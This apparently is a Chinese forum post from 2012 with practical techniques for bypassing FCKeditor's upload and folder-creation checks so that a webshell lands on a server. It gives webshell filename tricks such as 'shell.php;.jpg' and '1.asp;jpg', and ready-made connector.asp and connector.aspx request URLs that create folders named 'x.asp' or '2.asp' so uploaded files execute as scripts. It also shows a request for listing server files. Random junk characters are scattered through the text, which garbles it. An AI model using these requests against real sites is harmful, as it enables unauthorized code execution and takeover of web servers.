很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg/ z% }9 V; Q* z e' s" ?5 ~
6 n. j1 {3 t" r9 ~1 r提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。( s( I8 U& C# j0 f g+ N
+ @: t4 j: q# z; S& ]! I$ H- Y2 {
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
' b% I) `8 w3 r6 c: N- f: t4 p5 K$ {, I" {
突破建立文件夹:! `1 g! u6 G* U) [. o2 c
" K0 Z) r3 l( |9 X, ` A
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
& u/ Y; ^# }& h1 V1 D$ N7 ^( R
. m5 f0 o$ q% ^7 L) o9 d参数:
" g @, E% S! T/ \
, f+ r8 q, u& A% }当前目录名:CurrentFolder=/qing.asp l; z7 p" @9 T- x/ @7 R
$ b* ?. j6 g! h新的目录名:NewFolderName=x.asp
, Z# L6 U b9 f3 u0 T( B, E% Y0 i* I C% K0 A
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……& t. d. j1 B. k" u
" I# Y8 n* b5 r* Q& Q* P( }) I3 V那么 x.asp 就已经建立生成了,此方法百试百灵!% s0 B: M$ }( {4 I: \% h: z# M
; W! g) q/ p* J6 m1 g
新建文件夹参数 x.asp,基本都能搞定。
, o1 b% I' R8 P; X
" l: h/ a0 W9 Q: f下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建8 _& x- _0 {0 y4 a/ p3 d
# ?, }& S' s$ D1 I$ o/ f
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
0 Y! J9 D$ y" y3 i- \% G& ?6 m! l. k0 p
获取文件列表4 @7 o% g: r2 t4 {! q
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F9 ?/ \/ f: a* D- n7 p
0 q6 ?# B; @6 W- i4 {. @- d3 [
|
发表于 2012-12-31 09:27:09
收藏
支持
反对